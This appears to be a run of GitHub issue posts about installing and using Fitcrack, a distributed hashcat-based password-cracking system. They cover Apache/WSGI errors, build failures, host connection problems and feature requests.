[Wed Feb 22 17:29:57.969004 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095]     return codecs.ascii_decode(input, self.errors)[0]
[Wed Feb 22 17:29:57.969017 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe9 in position 4: ordinal not in range(128)

I have attempted the installation of fitcrack on two different ubuntu 18.04 machines. In both instances, when I try to access http://localhost It appears to start to launch, but fails with a red network error box.

I CAN access localhost/fitcrack to access the user log in, just not the main dashboard.

I reviewed the apache2 error.log, and there are many Traceback errors in relation to flask and 'ImportError: cannot import name 'ContextVar' errors.

Is this error common in the apache2 logs? I'm wondering if there is a relation to the dashboard not launching and these errors?

Hello,

I have the same case as #14
I did as mentioned here https://nesfit.github.io/fitcrack/#/guide/hosts?id=using-the-command-line
But step 4. never happens (That's all, your host will soon appear in Webadmin)
I am in the server http://static.ip_address.clients.your-server.de/hosts and the list is always empty.

BR

I am trying to install fitcrack server on a laptop but I keep encountering an "error during compilation" while installing fitcrack using the automatic installer and selecting option 1(this is the same for option 2).

Laptop specs:
aser Chromebook model:N17Q8

• OS:Ubuntu 22.04 LTS x86_64
• Kernel:5.15.0-40-generic
• CPU:Intel Celeron N3350 (2) @ 2.400GHz
• GPU:Intel HD Graphics 500
• RAM:3806MiB(as reported from neofetch)

What is reported at the end:
make[2]: *** [Makefile:1748: libboinc_crypt_la-crypt.lo] Error 1 make[2]: Leaving directory '/root/fitcrack-2.3.0/boinc/lib' make[1]: *** [Makefile:648: all-recursive] Error 1 make[1]: Leaving directory '/root/fitcrack-2.3.0/boinc' make: *** [Makefile:552: all] Error 2 Error during compilation. root@server:~/fitcrack-2.3.0#

Full output:https://pastebin.com/cbp68hrb

Is there something im missing?

How do I access WA from remote host?
After going under my Fitcrack server address in browser i can see login frontpage but after being redirected to dashboard i get 401 errors:



What should I change during instalation and what should i do after to be able to access WA?

Hey!
I was now able to test the solution and compared to hashtopolis e.g. it has a much better UI feeling. I don't know about performance yet, but you paper states it's advantages in this regard as well.

Some observations I made, or features that I miss:

• exporting cracked passwords
• hashlists with usernames
• rerun a job with only hashes that have not been cracked yet and with only new (selectable) wordlists or rulesets.
• pass multiple rulesets to Hashcat (Hashcat will combine them to apply all rules of the second set on the first set). This will especially benefit cracking complex passwords that are based on known keywords like the company name. I really like the fact that you can create password lists from the web ui.

The width of the password file UI is quite small. I think that's a displaying bug, that I could fix on the client side.

Call me stupid, but I don't understand what to install on a client node, that it receives work from the master